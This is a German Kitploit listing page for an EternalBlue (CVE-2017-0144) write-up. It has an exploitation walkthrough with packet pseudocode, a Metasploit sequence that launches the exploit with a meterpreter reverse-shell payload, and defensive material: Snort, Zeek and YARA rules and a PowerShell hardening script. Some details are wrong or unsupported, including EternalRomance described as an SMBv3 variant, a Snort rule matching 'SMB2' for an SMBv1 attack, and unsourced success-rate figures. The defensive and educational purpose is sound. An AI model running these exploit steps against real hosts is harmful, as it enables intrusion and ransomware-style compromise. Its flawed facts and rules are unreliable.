Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
Tools/GitHubGitHub/firetemple/blackash-cve-2017-0144
Vulnerability AnalysisExploitationForensicsMalware AnalysisPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationCurated Resources
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

🌐 CVE-2017-0144 — EternalBlue: Schwachstelle zur Remotecodeausführung in Microsoft Windows SMBv1

EternalBlue

"Ein Exploit. Dutzende Malware-Familien. Milliarden Schaden."


🔍 Zusammenfassung in einem Satz

CVE-2017-0144 ist eine kritische Schwachstelle zur Remotecodeausführung in der SMBv1-Serverimplementierung von Microsoft Windows. Der als EternalBlue bekannte Exploit nutzte diese Lücke aus und wurde bei Angriffen mit schwerwiegenden Auswirkungen (insbesondere WannaCry) eingesetzt.


🔥 Top 10 Malware, die EternalBlue nutzt (detailliert)

#MalwareTypErstmals gesehenAkteurSchadenAnmerkungen
1WannaCryRansomwareMay 12, 2017Lazarus Group (DPRK)$4–8BKillswitch: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaWiper (Als Ransomware getarnt)Jun 27, 2017Sandworm (Russland)$10B+Nutzt Mimikatz + EternalBlue + PSEXEC
3Bad RabbitRansomwareOct 24, 2017Indrik SpiderRegionalDrive-by mit gefälschtem Flash-Update
4UiwixRansomwareMay 2017UnbekanntNiedrigKein Killswitch, unauffälliger als WannaCry
5EternalRocksWurmMay 2017UnbekanntMittel7 NSA-Tools (inkl. DoublePulsar)
6AdylkuzzCryptominerMay 2017UnbekanntHoch (still)Mine Monero vor WannaCry
7RetefeBanking-Trojaner2017–2018UnbekanntEU-BankenNutzt EternalBlue für laterale Bewegung
8TrickBotModulare Malware2017–2021Wizard SpiderGlobalDrop von Ryuk über EternalBlue
9EmotetLoader2017–2021TA542GlobalWird als Einstieg für Cobalt Strike genutzt
10Clop / DridexRansomware2019–2025TA505Gesundheitswesen, RegierungNoch 2025 aktiv

🧨 Entwicklung des EternalBlue-Exploits

eternelblue1
eternelblue2

🔍 Wie CVE-2017-0144 (EternalBlue) ausgenutzt wurde

Ein schrittweiser technischer Deep Dive in die SMBv1 RCE

"Ein fehlerhaftes Paket. Vollständiger SYSTEM-Zugriff. Keine Anmeldung. Kein Klick."


🎯 TL;DR Exploit-Ablauf

root@kitploit:~
[Angreifer] 
   │
   ├──▶ Sendet manipulierten SMBv1 **Trans2**-Request
   │       → Löst **Heap-Überlauf** in `srv!SrvOS2FeaListSizeToNt` aus
   │
   ├──▶ Überschreibt Funktionszeiger → **Kernel-Shellcode**
   │
   └──▶ Führt **DoublePulsar**-Backdoor aus → **Ring-0-Payload**
           (z.B. WannaCry `mssecsvc.exe`)

🛠️ Voraussetzungen für die Ausnutzung


🚀 Exploit-Phasen (7 Schritte)

Phase 1: SMB-Protokollverhandlung

root@kitploit:~
SMB_COM_NEGOTIATE → Client sendet Dialektliste
Server antwortet: SMBv1 unterstützt → Weiter

Warum? Bestätigt, dass SMBv1 aktiv ist.


Phase 2: Tree Connect zu IPC$

eternelblue3
root@kitploit:~
\\TARGET\IPC$ → Anonymer Share für SMB-Pipes

Zweck: Stellt eine Sitzung zum Senden von Transaktionsanfragen her.


Phase 3: Trans2-Session-Setup (primär)

  • Verwendet SMB_COM_TRANSACTION2 (0x32)
  • Unterbefehl: SESSION_SETUP
  • Richtet FEALIST-Struktur mit fehlerhafter Größe ein
root@kitploit:~
FEALIST {
    SizeOfListInBytes = 0xFFFF (oder großer Wert)
    ...
}

Bug-Trigger: SrvOS2FeaListSizeToNt() vertraut dieser Größe ohne Grenzprüfung.


Phase 4: Sekundäre Trans2-Anfrage (Überlauf)

  • Sendet mehrere sekundäre Pakete
  • Jedes enthält überdimensionierte FEALIST + FEA (Datei-erweiterte Attribute)
eternelblue4
root@kitploit:~
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Pufferüberlauf
}

Heap Spray: Alloziert große Blöcke, um Speicherlayout zu kontrollieren.


Phase 5: Pufferüberlauf im Kernel

root@kitploit:~
srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // vom Angreifer kontrolliert
    PULONG pNtFeaListSize  // Ausgabezeiger
)
{
    // Keine Validierung von FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

Ergebnis:

  • Heap-Überlauf → Überschreiben benachbarter Kernel-Objekte
  • Ziel: SRVNET_BUFFER oder POOL_HEADER
  • Überschreiben von Funktionszeigern (z. B. Free-Routine)

Phase 6: Kernel-Shellcode-Ausführung

  • Angreifer kontrolliert RIP/EIP über überschriebenen Funktionszeiger
  • Springt zu Shellcode im Non-Paged-Pool

Shellcode tut:

  1. Ring-0 → Ring-3-Übergang (über KeUserModeCallback)
  2. Alloziert User-Mode-Speicher
  3. Lädt/Staged Payload (z. B. mssecsvc.exe)
  4. Installiert DoublePulsar-Backdoor

Phase 7: DoublePulsar-Backdoor-Implantat

eternelblue6
  • Injiziert Kernel-Treiber (0x00120034 XOR-Key)
  • Horcht auf magische SMB-Pakete:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + Payload

WannaCry-Beispiel:

root@kitploit:~
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Verschlüsselt Dateien

🧨 Exploit-Paketstruktur (vereinfacht)

root@kitploit:~
SMB-Header
└── Befehl: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Daten: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Spray Heap
                [OVERFLOW] → Überschreibe Pool
                [SHELLCODE] → x64 ring0

🛠️ Reale Exploit-Tools

Metasploit-Beispiel

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 Memory-Forensik-Nachweise


🛡️ Erkennungsregeln

Snort/Suricata

root@kitploit:~
alert tcp any any -> $HOME_NET 445 (
    msg:"ETERNALBLUE Attempt";
    flow:to_server,established;
    content:"|ff|SMB2"; depth:5;
    content:"|00 04 08 00|"; distance:100; within:4;
    classtype:attempted-admin;
    sid:1000001;
)

Zeek (Bro)

root@kitploit:~
event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
    if (args$data_len > 4096) {
        NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
    }
}

🔄 Wurmverbreitung (WannaCry-Schleife)

root@kitploit:~
while (true) {
    Scan network for port 445
    if (open) → EternalBlue exploit
    if (success) → Drop mssecsvc.exe + propagate
    Sleep(random(1000, 5000))
}

Verbreitungsgeschwindigkeit: ~10.000 Infektionen/Stunde weltweit.


🛑 Warum es so gut funktionierte


🎯 Exploit-Erfolgsrate (2017–2025)

JahrErfolgsrate % (Ungepatcht)
201799%
202085%
2025~60% (nur Legacy)

Funktioniert immer noch auf Windows 7/2008 R2 ohne MS17-010


📚 Referenzen

  • Microsoft MS17-010
  • RiskSense EternalBlue-Analyse
  • Metasploit-Modul
  • NSA-FuzzBunch-Leak

⚡ Abschließende Zusammenfassung: Wie es ausgenutzt wurde

EternalBlue = Waffengewordener Mathematikfehler
Ein vertrautes Größenfeld in SMB → Kernel-Heap-Überlauf → beliebiger Code → globale Ransomware-Pandemie

root@kitploit:~
SMB-Paket → Pufferüberlauf → Kernel-Shellcode → DoublePulsar → Malware

Visualisiert, seziert und kampferprobt. Für Pentester, IR-Teams und Verteidiger.

"Ein Paket. Ein Port. Ein Imperium fällt."


🛡️ Patch- und Erkennungsmatrix


🔍 YARA-Regeln (Top 3 Malware)

1. WannaCry

Wana_Decrypt0r_screenshot
root@kitploit:~
rule WannaCry_Ransomware {
    strings:
        $mz = { 4d 5a }
        $s1 = "WannaDecryptor" wide
        $s2 = "tasksche.exe"
        $s3 = "@WANA" ascii
        $encrypt = { 57 61 6E 61 43 72 79 70 74 30 72 }
    condition:
        $mz at 0 and 2 of ($s*)
}

2. NotPetya

Petya A
root@kitploit:~
rule NotPetya_Wiper {
    strings:
        $pdb = "perfc.dat" nocase
        $dll = "dllhost.dat"
        $mof = "ntdevmgr.vbs"
        $mimikatz = "mimikatz"
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

3. EternalBlue-Exploit-Paket

nessus1 nessus2
root@kitploit:~
rule EternalBlue_SMB_Exploit {
    strings:
        $smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
        $tree_connect = { 00 00 00 ?? ff 53 4d 42 75 00 }
        $trans2 = { 00 00 00 ?? ff 53 4d 42 32 00 }
        $overflow = { 00 04 08 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? }
    condition:
        all of them
}

📊 Status 2025: Noch aktiv?


🛑 Kill Chain (MITRE ATT&CK)


🛠️ Vollständiges Behebungsskript (PowerShell)

root@kitploit:~
# === ETERNALBLUE HARDENING SCRIPT ===
Write-Host "Applying EternalBlue Mitigations..." -ForegroundColor Cyan

# 1. Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# 2. Block Port 445
New-NetFirewallRule -DisplayName "Block SMB Inbound" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445

# 3. Enable SMB Signing
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1

# 4. Check Patch
$patch = Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
if ($patch) { Write-Host "Patched!" -ForegroundColor Green } else { Write-Host "UNPATCHED!" -ForegroundColor Red }

Write-Host "Reboot required. Run as Admin."

📚 Referenzen & Quellen


⚡ Abschlusswort (2025)

CVE-2017-0144 ist nicht tot — es ist ein Legacy-Zombie.
Es gedeiht in:

  • Ungepatchte Windows 7/2008
  • Shadow IT
  • Air-Gapped-kritische Systeme
  • Falsch konfigurierte Cloud-VMs

Wenn Sie Port 445 aus dem Internet anpingen können — sind Sie als Nächstes dran.


Erstellt mit Präzision, Visualisierungen und realen Bedrohungsinformationen. Stand Nov 2025.
Für Pentest-Labore, IR-Playbooks oder CISO-Briefings.


"Patchen Sie es. Blocken Sie es. Töten Sie es mit Feuer."

Tool herunterladen
ToolVeröffentlichungFunktionen
EternalBlue (Original)Apr 2017 (Shadow Brokers)SMBv1 RCE
DoublePulsarApr 2017Backdoor-Implantat (ring0)
EternalRomanceApr 2017SMBv3-Variante
EternalChampionApr 2017Alternativer SMB-Pfad
Metasploit-ModulMay 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchApr 2017NSA-Exploit-Framework
Impacket + PSEXEC2017–2025Python-SMB-Exploitation
AnforderungDetails
ZielWindows mit aktiviertem SMBv1 (Standard vor Win10)
Offener Port445/TCP (oder 139/TCP über NetBIOS)
Keine AuthentifizierungUnauthentifiziert — kein Benutzername/Passwort nötig
Architekturx86 oder x64 (beide unterstützt)
Patch-StatusUngepatcht (vor MS17-010)
ToolSpracheModul
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
Benutzerdefiniertes C2C/C++WannaCry, NotPetya
ArtefaktOrtWert
DoublePulsarKernel-SpeicherXOR-Key 0x00120034
Shellcodesrvnet.sys PoolMuster 0xCC 0x90 0x48
Injizierte DLLC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
FaktorGrund
Keine AuthentifizierungSMBv1 erlaubt anonymes IPC$
WurmfähigIntegrierter LAN-Scan
Kernel RCEUmgeht AV/Benutzerabfragen
Legacy SMBv1Seit 15+ Jahren standardmäßig aktiviert
Ungepatchte SystemeXP, 2003, 7 in kritischer Infrastruktur
BetriebssystemKB-PatchSMBv1 deaktivierenNmap-Skript
Windows 7 / 2008 R2KB4012212sc config lanmanworkstation depend= bowser/mrxsmb20/nsismb-vuln-ms17-010.nse
Windows 10KB4013429PowerShell: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Windows XP (EOL)KB4012598 (Notfall)Registry: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0
MetrikStatus
Shodan Offengelegtes SMBv1~1,2 Millionen (Nov 2025)
Aktive Exploits (Honeypots)Täglich
Ransomware, die es nutztClop, LockBit (Legacy-Ziele)
Am stärksten gefährdetGesundheitswesen, Fertigung, KMU
Zero-Trust-FixBlock 445, MFA erzwingen, EDR
PhaseTechnikID
ErstzugriffExploit öffentlicher AnwendungT1190
AusführungWindows SMB RCET1210
PersistenzBackdoor über DoublePulsarT1505.003
Laterale BewegungSMB/Windows-Admin-FreigabenT1021.002
AuswirkungDatenverschlüsselung für AuswirkungT1486
QuelleLink
NVDnvd.nist.gov/vuln/detail/CVE-2017-0144
Microsoft MS17-010msrc.microsoft.com/update-guide
MITRE ATT&CKattack.mitre.org/techniques/T1210
CrowdStrike WannaCry-Reportcrowdstrike.com/blog/wannacry
Kaspersky EternalBluekaspersky.com/blog/wannacry-ransomware
Shodan-Sucheshodan.io/search?query=port%3A445+os%3A%22Windows%22